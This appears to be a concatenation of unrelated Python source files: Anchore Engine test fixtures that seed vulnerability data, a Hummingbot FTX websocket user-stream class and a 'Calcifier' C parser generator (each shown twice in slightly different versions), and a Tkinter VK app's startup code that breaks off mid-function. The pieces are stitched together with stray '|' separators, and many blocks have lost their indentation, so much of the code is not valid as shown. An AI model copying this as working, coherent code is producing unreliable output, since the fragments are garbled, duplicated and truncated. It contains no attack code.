file_path = path.join(ANALYSIS_FILES_DIR, analysis_file.filename)
with open(file_path, "r") as f:
file_contents = f.read()
analysis_document = json.loads(file_contents)
add_or_replace_document(
"analysis_data", analysis_file.image_digest, analysis_document
)
image_id = analysis_document["document"][0]["image"]["imageId"]
try:
policy_engine_api.users.delete_image(image_id)
except http_utils.RequestFailedError as err:
if err.status_code != 404:
raise err
IMAGE_DIGEST_ID_MAP[analysis_file.image_digest] = image_id
def remove_documents_and_image() -> None:
"""
Cleanup, deletes added images and analyzer manifests.
"""
for analysis_file in ANALYSIS_FILES:
catalog_api.objects.delete_document(
"analysis_data", analysis_file.image_digest
)
policy_engine_api.users.delete_image(
IMAGE_DIGEST_ID_MAP[analysis_file.image_digest]
)
request.addfinalizer(remove_documents_and_image)
@pytest.fixture(scope="package")
def ingress_image(add_catalog_documents) -> Callable[[str], http_utils.APIResponse]:
    """
    Returns method that adds new image to policy engine for vulnerability scanning. Moved to fixture to reduce code duplication.

    :return: METHOD that calls ingress_image for the policy engine API with the appropriate catalog URL
    :rtype: Callable[[str], http_utils.APIResponse]
    """

    def _ingress_image(image_digest: str) -> http_utils.APIResponse:
        """
        Adds new image to policy engine for vulnerability scanning. Moved to fixture to reduce code duplication.

        :param image_digest: image digest of image to ingress
        :type image_digest: str
        :return: api response
        :rtype: http_utils.APIResponse
        """
        # catalog:// URL tells the policy engine to fetch the analysis
        # document from the catalog service under the default account.
        fetch_url = f"catalog://{http_utils.DEFAULT_API_CONF['ANCHORE_API_ACCOUNT']}/analysis_data/{image_digest}"
        image_id = IMAGE_DIGEST_ID_MAP[image_digest]
        return policy_engine_api.images.ingress_image(fetch_url, image_id)

    return _ingress_image
@pytest.fixture(scope="package")
def ingress_all_images(ingress_image) -> None:
"""
Ingress all test images.
"""
for analysis_file in ANALYSIS_FILES:
ingress_image(analysis_file.image_digest)
@pytest.fixture(scope="session")
def image_digest_id_map() -> Dict[str, str]:
"""
:return: lookup mapping of image_digest to image_id
:rtype: Dict[str, str]
"""
return IMAGE_DIGEST_ID_MAP
SEED_FILE_TO_DB_TABLE_MAP: Dict[str, Callable] = {
"feed_data_vulnerabilities.json": Vulnerability,
"feed_data_vulnerabilities_fixed_artifacts.json": FixedArtifact,
"feed_data_nvdv2_vulnerabilities.json": NvdV2Metadata,
"feed_data_cpev2_vulnerabilities.json": CpeV2Vulnerability,
"feeds.json": FeedMetadata,
"catalog_image.json": CatalogImage,
"catalog_image_docker.json": CatalogImageDocker,
}
CATALOG_FILES = ["catalog_image.json", "catalog_image_docker.json"]
VULN_DATA_FILES = [
"feed_data_vulnerabilities.json",
"feed_data_vulnerabilities_fixed_artifacts.json",
"feed_data_nvdv2_vulnerabilities.json",
"feed_data_cpev2_vulnerabilities.json",
"feeds.json",
]
SEED_FILE_TO_METADATA_MAP: Dict[str, str] = {
"feed_data_vulnerabilities.json": "metadata_json",
"feed_data_vulnerabilities_fixed_artifacts.json": "fix_metadata",
}
def load_seed_file_rows(file_name: str) -> Generator[Dict, None, None]:
"""
Loads database seed files (json lines) and yields the json objects.
:param file_name: name of seed file to load
:type file_name: str
:return: generator yields json
:rtype: Generator[Dict, None, None]
"""
json_file = os.path.join(SEED_FILE_DIR, file_name)
with open(json_file, "rb") as f:
for line in f:
linetext = line.decode("unicode_escape").strip()
json_content = json.loads(linetext)
if file_name in SEED_FILE_TO_METADATA_MAP:
json_key = SEED_FILE_TO_METADATA_MAP[file_name]
if json_content[json_key] is not None:
json_content[json_key] = json.loads(json_content[json_key])
yield json_content
def _setup_vuln_data():
"""
Loads database seed files and bulk saves all records direclty to db
"""
with session_scope() as db:
all_records = []
files_to_seed = CATALOG_FILES.copy()
# If legacy provider, add vuln data to be seeded to files
# if grype provider, ensure the grypedb is synced
if is_legacy_provider():
files_to_seed += VULN_DATA_FILES
else:
policy_engine_api.feeds.feeds_sync(force_flush=True)
# seed data to engine db
for seed_file_name in files_to_seed:
entry_cls = SEED_FILE_TO_DB_TABLE_MAP[seed_file_name]
for db_entry in load_seed_file_rows(seed_file_name):
all_records.append(entry_cls(**db_entry))
db.bulk_save_objects(all_records)
db.flush()
@pytest.fixture(scope="package", autouse=True)
def setup_vuln_data(
request, set_env_vars, anchore_db, teardown_and_recreate_tables
) -> None:
"""
Writes database seed file content to database. This allows us to ensure consistent vulnerability results (regardless of feed sync status).
"""
tablenames = [cls.__tablename__ for cls in SEED_FILE_TO_DB_TABLE_MAP.values()]
tablenames.extend(
[CachedPolicyEvaluation.__tablename__, ImageVulnerabilitiesReport.__tablename__]
)
teardown_and_recreate_tables(tablenames)
_setup_vuln_data()
request.addfinalizer(lambda: teardown_and_recreate_tables(tablenames))
|
import asyncio
from decimal import Decimal
import logging
import time
from typing import (
AsyncIterable,
Dict,
Optional
)
import json
import simplejson
import websockets
from hummingbot.core.data_type.user_stream_tracker_data_source import UserStreamTrackerDataSource
from hummingbot.logger import HummingbotLogger
from hummingbot.connector.exchange.ftx.ftx_auth import FtxAuth
FTX_API_ENDPOINT = "wss://ftx.com/ws/"
FTX_USER_STREAM_ENDPOINT = "userDataStream"
class FtxAPIUserStreamDataSource(UserStreamTrackerDataSource):
    """User-stream data source for FTX: authenticates over the exchange
    websocket, subscribes to the private ``orders`` and ``fills`` channels,
    and forwards every decoded event into an asyncio queue."""

    MESSAGE_TIMEOUT = 30.0  # seconds without a message before we ping
    PING_TIMEOUT = 10.0     # seconds to wait for the pong reply

    _bausds_logger: Optional[HummingbotLogger] = None

    @classmethod
    def logger(cls) -> HummingbotLogger:
        # Lazily create the shared class-level logger.
        if cls._bausds_logger is None:
            cls._bausds_logger = logging.getLogger(__name__)
        return cls._bausds_logger

    def __init__(self, ftx_auth: FtxAuth):
        super().__init__()
        self._listen_for_user_stream_task = None
        self._ftx_auth: FtxAuth = ftx_auth
        self._last_recv_time: float = 0

    @property
    def last_recv_time(self) -> float:
        """Unix timestamp of the most recently received websocket message."""
        return self._last_recv_time

    async def set_subscriptions(self, ws: websockets.WebSocketClientProtocol):
        # Authenticate first; the private channels require it.
        await ws.send(json.dumps(self._ftx_auth.generate_websocket_subscription()))
        await ws.send(json.dumps({"op": "subscribe", "channel": "orders"}))
        await ws.send(json.dumps({"op": "subscribe", "channel": "fills"}))

    async def listen_for_user_stream(self, ev_loop: asyncio.BaseEventLoop, output: asyncio.Queue):
        """Maintain the websocket forever, pushing every decoded event onto
        *output* and reconnecting 5 seconds after any failure."""
        while True:
            # Fix: the finally block dereferenced `ws` even when
            # get_ws_connection() itself raised (UnboundLocalError).
            ws = None
            try:
                ws = await self.get_ws_connection()
                await self.set_subscriptions(ws)
                async for message in self._inner_messages(ws):
                    # parse_float=Decimal keeps price/size precision intact.
                    decoded: Dict[str, any] = simplejson.loads(message, parse_float=Decimal)
                    if decoded['type'] == 'error':
                        # Fix: single-quoted nested subscripts — same-quote
                        # nesting in an f-string needs Python >= 3.12.
                        self.logger().warning(f"Error returned from ftx user stream: {decoded['code']}:{decoded['msg']}")
                    output.put_nowait(decoded)
            except asyncio.CancelledError:
                raise
            except asyncio.TimeoutError:
                self.logger().warning("WebSocket ping timed out. Reconnecting after 5 seconds...")
            except Exception:
                self.logger().error("Unexpected error while maintaining the user event listen key. Retrying after "
                                    "5 seconds...", exc_info=True)
            finally:
                if ws is not None:
                    await ws.close()
                await asyncio.sleep(5)

    async def _inner_messages(self, ws) -> AsyncIterable[str]:
        # Terminate the recv() loop as soon as the next message timed out, so the outer loop can reconnect.
        while True:
            try:
                msg: str = await asyncio.wait_for(ws.recv(), timeout=self.MESSAGE_TIMEOUT)
                self._last_recv_time = time.time()
                yield msg
            except asyncio.TimeoutError:
                # No traffic: ping and wait for the pong to prove liveness.
                pong_waiter = await ws.ping()
                await asyncio.wait_for(pong_waiter, timeout=self.PING_TIMEOUT)
                self._last_recv_time = time.time()

    def get_ws_connection(self):
        """Return an awaitable websocket connection to the FTX endpoint."""
        stream_url: str = f"{FTX_API_ENDPOINT}"
        return websockets.connect(stream_url)
| import asyncio
from decimal import Decimal
import logging
import time
from typing import (
AsyncIterable,
Dict,
Optional
)
import json
import simplejson
import websockets
from hummingbot.core.data_type.user_stream_tracker_data_source import UserStreamTrackerDataSource
from hummingbot.logger import HummingbotLogger
from hummingbot.connector.exchange.ftx.ftx_auth import FtxAuth
FTX_API_ENDPOINT = "wss://ftx.com/ws/"
FTX_USER_STREAM_ENDPOINT = "userDataStream"
class FtxAPIUserStreamDataSource(UserStreamTrackerDataSource):
    """User-stream data source for FTX: authenticates over the exchange
    websocket, subscribes to the private ``orders`` and ``fills`` channels,
    and forwards every decoded event into an asyncio queue."""

    MESSAGE_TIMEOUT = 30.0  # seconds without a message before we ping
    PING_TIMEOUT = 10.0     # seconds to wait for the pong reply

    _bausds_logger: Optional[HummingbotLogger] = None

    @classmethod
    def logger(cls) -> HummingbotLogger:
        # Lazily create the shared class-level logger.
        if cls._bausds_logger is None:
            cls._bausds_logger = logging.getLogger(__name__)
        return cls._bausds_logger

    def __init__(self, ftx_auth: FtxAuth):
        super().__init__()
        self._listen_for_user_stream_task = None
        self._ftx_auth: FtxAuth = ftx_auth
        self._last_recv_time: float = 0

    @property
    def last_recv_time(self) -> float:
        """Unix timestamp of the most recently received websocket message."""
        return self._last_recv_time

    async def set_subscriptions(self, ws: websockets.WebSocketClientProtocol):
        # Authenticate first; the private channels require it.
        await ws.send(json.dumps(self._ftx_auth.generate_websocket_subscription()))
        await ws.send(json.dumps({"op": "subscribe", "channel": "orders"}))
        await ws.send(json.dumps({"op": "subscribe", "channel": "fills"}))

    async def listen_for_user_stream(self, ev_loop: asyncio.BaseEventLoop, output: asyncio.Queue):
        """Maintain the websocket forever, pushing every decoded event onto
        *output* and reconnecting 5 seconds after any failure."""
        while True:
            # Fix: the finally block dereferenced `ws` even when
            # get_ws_connection() itself raised (UnboundLocalError).
            ws = None
            try:
                ws = await self.get_ws_connection()
                await self.set_subscriptions(ws)
                async for message in self._inner_messages(ws):
                    # parse_float=Decimal keeps price/size precision intact.
                    decoded: Dict[str, any] = simplejson.loads(message, parse_float=Decimal)
                    if decoded['type'] == 'error':
                        self.logger().warning(f"Error returned from ftx user stream: {decoded['code']}:{decoded['msg']}")
                    output.put_nowait(decoded)
            except asyncio.CancelledError:
                raise
            except asyncio.TimeoutError:
                self.logger().warning("WebSocket ping timed out. Reconnecting after 5 seconds...")
            except Exception:
                self.logger().error("Unexpected error while maintaining the user event listen key. Retrying after "
                                    "5 seconds...", exc_info=True)
            finally:
                if ws is not None:
                    await ws.close()
                await asyncio.sleep(5)

    async def _inner_messages(self, ws) -> AsyncIterable[str]:
        # Terminate the recv() loop as soon as the next message timed out, so the outer loop can reconnect.
        while True:
            try:
                msg: str = await asyncio.wait_for(ws.recv(), timeout=self.MESSAGE_TIMEOUT)
                self._last_recv_time = time.time()
                yield msg
            except asyncio.TimeoutError:
                # No traffic: ping and wait for the pong to prove liveness.
                pong_waiter = await ws.ping()
                await asyncio.wait_for(pong_waiter, timeout=self.PING_TIMEOUT)
                self._last_recv_time = time.time()

    def get_ws_connection(self):
        """Return an awaitable websocket connection to the FTX endpoint."""
        stream_url: str = f"{FTX_API_ENDPOINT}"
        return websockets.connect(stream_url)
|
import sys
import io
class Calcifier:
def __init__(self):
self.root = "root"
self.lang = "calcifier_calc"
self.rules = {}
self.rules_by_priority = {}
self.node_type = ""
def priorities(self):
return self.rules_by_priority.keys()
@staticmethod
def crange(_from: str, _to: str) -> str:
return set(map(chr, range(ord(_from), ord(_to) + 1)))
def load(self, file: io.TextIOWrapper) -> bool:
self.__init__()
if not file.readable():
return False
for src in file.read().splitlines():
if src == None:
break
src = list(filter(len, map(str.strip, src.split(" "))))
if len(src) == 0 or src[0] == '#':
continue
if len(src) == 1 and src[0] == "end":
break
if self.load_lang(src):
continue
if self.load_type(src):
continue
if self.load_root(src):
continue
if self.load_rule(src):
continue
print(f'#error "{src}"')
return False
if self.node_type == "":
self.node_type = self.lang + "_node_t"
return True
def load_root(self, src: list) -> bool:
if len(src) == 2 and src[0] == "root":
self.root = src[1]
return True
return False
def load_lang(self, src: list) -> bool:
if len(src) == 2 and src[0] == "lang":
self.lang = src[1]
return True
return False
def load_type(self, src: list) -> bool:
if len(src) == 2 and src[0] == "type":
self.node_type = src[1]
return True
return False
# bug: maybe this function has any well-known name
@staticmethod
def zigzag(lst: list, unit: int) -> list:
r = []
u = []
for i in lst:
u += [i]
if len(u) >= unit:
r += [u]
u = []
return r
def load_rule(self, src: list) -> bool:
header = 7
if not (len(src) >= header + 2
and src[0] == "rule"
and (len(src) - header) % 2 == 0):
return False
base_rule = {
'priority': src[1],
'order': src[2],
'argc': int(src[3]),
'left': src[4],
'right': src[5],
'next': src[6]
}
if base_rule['priority'] not in self.priorities():
self.rules_by_priority[base_rule['priority']] = []
for c, f in self.zigzag(src[header:], 2):
rule = base_rule.copy()
rule.update({
'key': c,
'function': f
})
self.rules[rule['key']] = rule
self.rules_by_priority[rule['priority']] += [rule]
return True
def dump(self, file: io.TextIOWrapper):
file.writelines([
f'lang {self.lang}\n',
f'type {self.node_type}\n',
f'root {self.root}\n'
])
for key in self.priorities():
rules = self.rules_by_priority[key]
r = rules[0]
file.write(f'rule {key}' +
f' {r['order']} {r['argc']}' +
f' {r['left']} {r['right']} {r['next']}')
for rule in rules:
file.write(f' {rule['key']} {rule['function']}')
file.write("\n")
def is_then(self, rule):
return rule['function'] in [ "if", "then", "pyif" ]
def is_do(self, rule):
return rule["function"] == "do"
def is_while(self, rule):
return rule["function"] == "while"
def generate(self, file: io.TextIOWrapper) -> bool:
if not file.writable():
return False
if self.root not in self.priorities():
return False
self.generate_header(file)
for key in self.priorities():
self.generate_func(file, key)
return True
def generate_header(self, file: io.TextIOWrapper):
file.write(f"""
#include "calcifier_rtl.h"
#include "{self.lang}.h"
typedef {self.node_type} node_t;
""")
for key in self.priorities():
rules = self.rules_by_priority[key]
file.write("static " + self.func_header(rules[0]) + ";\n")
file.write(f"""
bool {self.lang}_tryParse(char *s, ptrdiff_t len, node_t *out_value) {{
return tryParse_{self.root}(s, len, out_value);
}}
""")
file.write(f"""
static bool tryParse_n(char *s, ptrdiff_t len, node_t *out_value) {{
if (s == NULL || !*s || len == 0
|| !tryTrim(s, len, &s, &len)
|| len == 0)
return false;
return {self.lang}_tryParseValue(s, len, out_value);
}}
""")
def func_name(self, rule) -> str:
return f'tryParse_{rule['priority']}'
def func_header(self, rule) -> str:
head = ""
if self.is_then(rule):
t = "Elseable"
return (f'bool {self.func_name(rule)}' +
f'(char *s, ptrdiff_t len, node_t *out_value)')
def generate_nodefuncs(self, file: io.TextIOWrapper):
for r in self.rules:
file.write(f'extern node_t {self.lang}_{r['key']}_{r['argc']}(')
for i in range(r["argc"]):
if i > 0:
file.write(", ")
file.write("node_t")
file.write(");\n")
@staticmethod
def escape_char(c):
if ord(c) in range(33, 127) and c not in "\\\"\'":
return c
else:
return "\\x{:02x}".format(ord(c))
def escape_str(self, s):
return "".join(list(map(self.escape_char, s)))
def rules_to_keys(self, rules: list) -> str:
def f(rule):
return self.escape_char(rule["key"])
return "".join(list(map(f, rules)))
def generate_func(self, file: io.TextIOWrapper, priority: str) -> bool:
rules = self.rules_by_priority[priority]
rule = rules[0]
skip = f'{self.lang}_skip{rule['order']}'
if rule["next"] == priority:
return False
if rule["left"] == priority and rule["right"] == priority:
return False
if rule["left"] == priority and rule["order"] == "l":
return False
if rule["right"] == priority and rule["order"] == "r":
return False
if rule["argc"] not in range(1, 3):
return False
file.write(f"""
{self.func_header(rule)} {{
char *s2;
ptrdiff_t len2;
if (s == NULL || !*s || len == 0
|| !tryTrim(s, len, &s2, &len2)
|| len2 == 0)
return false;
""")
if rule["argc"] == 1:
if rule["left"] != "-" and rule["right"] != "-":
return False
if rule["order"] == "l":
idx = "0"
next_idx = "s2 + 1"
else:
idx = "len2 - 1"
next_idx = "s2"
if rule["left"] != "-":
child = "left"
else:
child = "right"
file.write(f"""
if (strchr("{self.rules_to_keys(rules)}", s2[{idx}])
&& tryParse_{rule[child]}({next_idx}, len2 - 1, out_value))
{{
if (out_value) {{
""")
for r in rules:
file.write(f"""if (s2[{idx}] == '{r["key"]}')
*out_value = {self.lang}_newnode_{r["function"]}_1(*out_value, {self.lang}_nilnode());
else """)
file.write(f"""{{
{self.lang}_delnode(*out_value);
*out_value = {self.lang}_nilnode();
}}
}}
return true;
}}
return """)
if rule["next"] == "-":
file.write("false")
else:
file.write(f"""tryParse_{rule["next"]}(s2, len2, out_value)""")
file.write(""";
}""")
return True
if rule["argc"] != 2:
return False
if rule["left"] == "-" or rule["right"] == "-":
return False
# any binary operators
file.write(f"""
node_t left = {self.lang}_nilnode(), right = {self.lang}_nilnode();
""")
if rule["order"] == "l":
file.write(f"""
for (ptrdiff_t opr = 0; opr < len2; opr = {skip}(s2, len2, opr)) {{""")
else:
file.write(f"""
for (ptrdiff_t opr = len2; (opr = {skip}(s2, len2, opr)) > 0;) {{""")
file.write(f"""
left = {self.lang}_delnode(left);
right = {self.lang}_delnode(right);
if (!strchr("{self.rules_to_keys(rules)}", s2[opr])) continue;
char *right_p = s2 + opr + 1;
ptrdiff_t right_len = len2 - opr - 1;
if (tryParse_{rule["left"]}(s2, opr, &left)
&& tryParse_{rule["right"]}(right_p, right_len, &right))
{{
if (out_value) {{
""")
for r in rules:
file.write(f"""if (s2[opr] == '{r["key"]}')
*out_value = {self.lang}_newnode_{r["function"]}_2(left, right);
else """)
file.write(f"""{{
*out_value = left;
{self.lang}_delnode(right);
}}
}}
return true;
}}
}}
return """)
if rule["next"] == "-":
file.write('false')
else:
file.write(f'tryParse_{rule['next']}(s2, len2, out_value)')
file.write(""";
}
""")
return True
# Script entry point: read a grammar definition from stdin and emit the
# generated C parser on stdout, echoing the parsed grammar inside a C
# comment for traceability.
calcifier = Calcifier()
calcifier.load(sys.stdin)
print("/*")
calcifier.dump(sys.stdout)
print("*/")
calcifier.generate(sys.stdout)
| import sys
import io
class Calcifier:
def __init__(self):
self.root = "root"
self.lang = "calcifier_calc"
self.rules = {}
self.rules_by_priority = {}
self.node_type = ""
def priorities(self):
return self.rules_by_priority.keys()
@staticmethod
def crange(_from: str, _to: str) -> str:
return set(map(chr, range(ord(_from), ord(_to) + 1)))
def load(self, file: io.TextIOWrapper) -> bool:
self.__init__()
if not file.readable():
return False
for src in file.read().splitlines():
if src == None:
break
src = list(filter(len, map(str.strip, src.split(" "))))
if len(src) == 0 or src[0] == '#':
continue
if len(src) == 1 and src[0] == "end":
break
if self.load_lang(src):
continue
if self.load_type(src):
continue
if self.load_root(src):
continue
if self.load_rule(src):
continue
print(f'#error "{src}"')
return False
if self.node_type == "":
self.node_type = self.lang + "_node_t"
return True
def load_root(self, src: list) -> bool:
if len(src) == 2 and src[0] == "root":
self.root = src[1]
return True
return False
def load_lang(self, src: list) -> bool:
if len(src) == 2 and src[0] == "lang":
self.lang = src[1]
return True
return False
def load_type(self, src: list) -> bool:
if len(src) == 2 and src[0] == "type":
self.node_type = src[1]
return True
return False
# bug: maybe this function has any well-known name
@staticmethod
def zigzag(lst: list, unit: int) -> list:
r = []
u = []
for i in lst:
u += [i]
if len(u) >= unit:
r += [u]
u = []
return r
def load_rule(self, src: list) -> bool:
header = 7
if not (len(src) >= header + 2
and src[0] == "rule"
and (len(src) - header) % 2 == 0):
return False
base_rule = {
'priority': src[1],
'order': src[2],
'argc': int(src[3]),
'left': src[4],
'right': src[5],
'next': src[6]
}
if base_rule['priority'] not in self.priorities():
self.rules_by_priority[base_rule['priority']] = []
for c, f in self.zigzag(src[header:], 2):
rule = base_rule.copy()
rule.update({
'key': c,
'function': f
})
self.rules[rule['key']] = rule
self.rules_by_priority[rule['priority']] += [rule]
return True
def dump(self, file: io.TextIOWrapper):
file.writelines([
f'lang {self.lang}\n',
f'type {self.node_type}\n',
f'root {self.root}\n'
])
for key in self.priorities():
rules = self.rules_by_priority[key]
r = rules[0]
file.write(f'rule {key}' +
f' {r["order"]} {r["argc"]}' +
f' {r["left"]} {r["right"]} {r["next"]}')
for rule in rules:
file.write(f' {rule["key"]} {rule["function"]}')
file.write("\n")
def is_then(self, rule):
return rule['function'] in [ "if", "then", "pyif" ]
def is_do(self, rule):
return rule["function"] == "do"
def is_while(self, rule):
return rule["function"] == "while"
def generate(self, file: io.TextIOWrapper) -> bool:
if not file.writable():
return False
if self.root not in self.priorities():
return False
self.generate_header(file)
for key in self.priorities():
self.generate_func(file, key)
return True
def generate_header(self, file: io.TextIOWrapper):
file.write(f"""
#include "calcifier_rtl.h"
#include "{self.lang}.h"
typedef {self.node_type} node_t;
""")
for key in self.priorities():
rules = self.rules_by_priority[key]
file.write("static " + self.func_header(rules[0]) + ";\n")
file.write(f"""
bool {self.lang}_tryParse(char *s, ptrdiff_t len, node_t *out_value) {{
return tryParse_{self.root}(s, len, out_value);
}}
""")
file.write(f"""
static bool tryParse_n(char *s, ptrdiff_t len, node_t *out_value) {{
if (s == NULL || !*s || len == 0
|| !tryTrim(s, len, &s, &len)
|| len == 0)
return false;
return {self.lang}_tryParseValue(s, len, out_value);
}}
""")
def func_name(self, rule) -> str:
return f'tryParse_{rule["priority"]}'
def func_header(self, rule) -> str:
head = ""
if self.is_then(rule):
t = "Elseable"
return (f'bool {self.func_name(rule)}' +
f'(char *s, ptrdiff_t len, node_t *out_value)')
def generate_nodefuncs(self, file: io.TextIOWrapper):
for r in self.rules:
file.write(f'extern node_t {self.lang}_{r["key"]}_{r["argc"]}(')
for i in range(r["argc"]):
if i > 0:
file.write(", ")
file.write("node_t")
file.write(");\n")
@staticmethod
def escape_char(c):
if ord(c) in range(33, 127) and c not in "\\\"\'":
return c
else:
return "\\x{:02x}".format(ord(c))
def escape_str(self, s):
return "".join(list(map(self.escape_char, s)))
def rules_to_keys(self, rules: list) -> str:
def f(rule):
return self.escape_char(rule["key"])
return "".join(list(map(f, rules)))
def generate_func(self, file: io.TextIOWrapper, priority: str) -> bool:
    """Emit the C ``tryParse_<priority>`` function for one precedence level.

    Writes a recursive-descent parsing function to *file*, built from the
    rules registered under *priority*.  Returns True when a function was
    generated, False when the rule set is rejected (unsupported recursion
    pattern or arity).
    """
    rules = self.rules_by_priority[priority]
    # Rules sharing one priority share order/arity; the first rule is
    # representative for those structural properties.
    rule = rules[0]
    skip = f'{self.lang}_skip{rule["order"]}'
    # Reject grammars the generated code cannot express: direct
    # self-recursion and left/right recursion matching the scan order.
    if rule["next"] == priority:
        return False
    if rule["left"] == priority and rule["right"] == priority:
        return False
    if rule["left"] == priority and rule["order"] == "l":
        return False
    if rule["right"] == priority and rule["order"] == "r":
        return False
    # Only unary (1) and binary (2) operators are supported.
    if rule["argc"] not in range(1, 3):
        return False
    # Common prologue: trim the input and bail out on an empty operand.
    file.write(f"""
{self.func_header(rule)} {{
    char *s2;
    ptrdiff_t len2;
    if (s == NULL || !*s || len == 0
        || !tryTrim(s, len, &s2, &len2)
        || len2 == 0)
        return false;
""")
    if rule["argc"] == 1:
        # Unary operator: exactly one child side must be empty ("-").
        if rule["left"] != "-" and rule["right"] != "-":
            return False
        if rule["order"] == "l":
            # Prefix form: operator key at index 0, operand after it.
            idx = "0"
            next_idx = "s2 + 1"
        else:
            # Postfix form: operator key at the end, operand before it.
            idx = "len2 - 1"
            next_idx = "s2"
        if rule["left"] != "-":
            child = "left"
        else:
            child = "right"
        file.write(f"""
    if (strchr("{self.rules_to_keys(rules)}", s2[{idx}])
        && tryParse_{rule[child]}({next_idx}, len2 - 1, out_value))
    {{
        if (out_value) {{
""")
        # One if/else branch per rule key, mapping to its node constructor.
        for r in rules:
            file.write(f"""if (s2[{idx}] == '{r["key"]}')
                *out_value = {self.lang}_newnode_{r["function"]}_1(*out_value, {self.lang}_nilnode());
            else """)
        file.write(f"""{{
                {self.lang}_delnode(*out_value);
                *out_value = {self.lang}_nilnode();
            }}
        }}
        return true;
    }}
    return """)
        # Fall through to the next (tighter) priority level, if any.
        if rule["next"] == "-":
            file.write("false")
        else:
            file.write(f"""tryParse_{rule["next"]}(s2, len2, out_value)""")
        file.write(""";
}""")
        return True
    if rule["argc"] != 2:
        return False
    if rule["left"] == "-" or rule["right"] == "-":
        return False
    # any binary operators
    file.write(f"""
    node_t left = {self.lang}_nilnode(), right = {self.lang}_nilnode();
""")
    # Scan direction determines associativity of the generated parse.
    if rule["order"] == "l":
        file.write(f"""
    for (ptrdiff_t opr = 0; opr < len2; opr = {skip}(s2, len2, opr)) {{""")
    else:
        file.write(f"""
    for (ptrdiff_t opr = len2; (opr = {skip}(s2, len2, opr)) > 0;) {{""")
    file.write(f"""
        left = {self.lang}_delnode(left);
        right = {self.lang}_delnode(right);
        if (!strchr("{self.rules_to_keys(rules)}", s2[opr])) continue;
        char *right_p = s2 + opr + 1;
        ptrdiff_t right_len = len2 - opr - 1;
        if (tryParse_{rule["left"]}(s2, opr, &left)
            && tryParse_{rule["right"]}(right_p, right_len, &right))
        {{
            if (out_value) {{
""")
    # Same per-key dispatch as the unary case, binary constructors.
    for r in rules:
        file.write(f"""if (s2[opr] == '{r["key"]}')
                    *out_value = {self.lang}_newnode_{r["function"]}_2(left, right);
                else """)
    file.write(f"""{{
                    *out_value = left;
                    {self.lang}_delnode(right);
                }}
            }}
            return true;
        }}
    }}
    return """)
    if rule["next"] == "-":
        file.write('false')
    else:
        file.write(f'tryParse_{rule["next"]}(s2, len2, out_value)')
    file.write(""";
}
""")
    return True
# Script driver: rule definitions arrive on stdin; the human-readable dump
# is wrapped in a C block comment so the generated file stays compilable.
calcifier = Calcifier()
calcifier.load(sys.stdin)
sys.stdout.write("/*\n")
calcifier.dump(sys.stdout)
sys.stdout.write("*/\n")
calcifier.generate(sys.stdout)
|
import gc
import os
import time
import tracemalloc
from math import ceil
from shutil import rmtree
from sys import exit as exit_ex
from sys import platform
from time import time as time_now
from tkinter import Label, Tk
from tkinter.messagebox import showerror, showinfo, showwarning
from typing import Union
from webbrowser import open_new_tab as web_open_new_tab
import requests
import vk_api
from _tkinter import TclError
from apscheduler.schedulers.background import BackgroundScheduler
from PIL import Image, ImageTk
from base_data import GetRequestsToDB, MainDB, UpdateRequestsToDB
from settings import (DEFAULT_VALUE_FOR_BD, HTTP_FOR_REQUESTS, HTTP_GET_TOKEN,
ID_GROUP_VK, INFO_MSG, LOGGER, REPO_BRANCH_MASTER,
REPO_BRANCH_UPDATER, REPO_BRANCH_VERSION,
TIME_FREE_VERSION, VERSION_API, WARNING_MSG, path,
path_to_dir_ico)
from windows import AdditionalWindows
# Map sys.platform onto the OS label the rest of the application uses;
# any other platform is reported to the user and the program exits.
_OS_BY_PLATFORM = {'linux': 'Linux', 'win32': 'Windows', 'cygwin': 'Windows'}
if platform in _OS_BY_PLATFORM:
    OS = _OS_BY_PLATFORM[platform]
else:
    showerror(
        'Платформа не поддерживается',
        f'Неподдерживаемая платформа: {platform}\n\nОбратитесь за помощью '
        'к боту VK'
    )
    exit_ex()
class BrainForApp:
    """Configures and launches the application: splash screen, database
    checks, first-start setup, directory cleanup, background scheduler
    and the main window."""

    def __init__(self, window_preview):
        """Show the preview window, run startup checks and start the app.

        :param window_preview: Tk window used as the splash screen
        """
        self.logger = LOGGER('main', 'main')
        png_preview_open, png_preview = self.preview_image_open()
        self.preview_image_set(png_preview_open, png_preview, window_preview)
        window_preview.update()
        # Memory tracing feeds the scheduler job and the top-level
        # error handler with usage figures.
        tracemalloc.start()
        time.sleep(2)
        # Ensures the database and its tables exist.
        MainDB()
        get_requests_db = GetRequestsToDB()
        settings = get_requests_db.get_records(
            tb_name=get_requests_db.settings, one_record=True,
            select=['first_start', 'auto_update']
        )
        first_start = settings['first_start']
        auto_update = settings['auto_update']
        if first_start == 1:
            # First launch: collect personal data / agreement before
            # clearing the first-start flag.
            self.logger.info('Первый запуск')
            window_preview.destroy()
            done = AdditionalWindows().person_and_agreement_data()
            if done is True:
                update_requests_db = UpdateRequestsToDB()
                update_requests_db.update_table(
                    tb_name=update_requests_db.settings,
                    update_row={'first_start': 0}
                )
        self.logger.warning('Очистка от лишних файлов в директории')
        # Drop leftover updater/version/master checkouts, if present.
        list_path = os.listdir(path)
        if REPO_BRANCH_UPDATER in list_path:
            rmtree(REPO_BRANCH_UPDATER, ignore_errors=True, onerror=None)
        if REPO_BRANCH_VERSION in list_path:
            rmtree(REPO_BRANCH_VERSION, ignore_errors=True, onerror=None)
        if REPO_BRANCH_MASTER in list_path:
            rmtree(REPO_BRANCH_MASTER, ignore_errors=True, onerror=None)
        try:
            self.logger.warning('Закрытие окна первью')
            window_preview.destroy()
        except TclError:
            # Already destroyed on the first-start path above.
            pass
        del settings, first_start, list_path, window_preview
        gc.collect()
        self.logger.info('Создание задачи scheduler')
        scheduler = BackgroundScheduler()
        scheduler.start()
        # __scheduler__ is defined in this module's __main__ guard.
        scheduler.add_job(__scheduler__, 'interval', minutes=1)
        self.logger.info('Запуск приложения')
        # Imported late — presumably to avoid a circular import; verify.
        from windows import App
        App(auto_update, OS)
        self.logger.info('Закрытие приложения')

    def preview_image_open(self):
        """Load the preview image; return (PIL image, Tk photo image).

        Retries until the file can be read, logging each failure.
        NOTE(review): loops forever if the file never appears.
        """
        while True:
            try:
                png_preview_open = Image.open(
                    os.path.join(path_to_dir_ico, 'preview.png')
                )
                png_preview = ImageTk.PhotoImage(png_preview_open)
                return png_preview_open, png_preview
            except FileNotFoundError as err:
                self.logger.error(str(err))

    @staticmethod
    def preview_image_set(png_preview_open, png_preview, window_preview):
        """Size the window to the image, center it on screen and install
        the image as the window background."""
        x_img, y_img = png_preview_open.size
        x = (window_preview.winfo_screenwidth() - x_img) // 2
        y = (window_preview.winfo_screenheight() - y_img) // 2
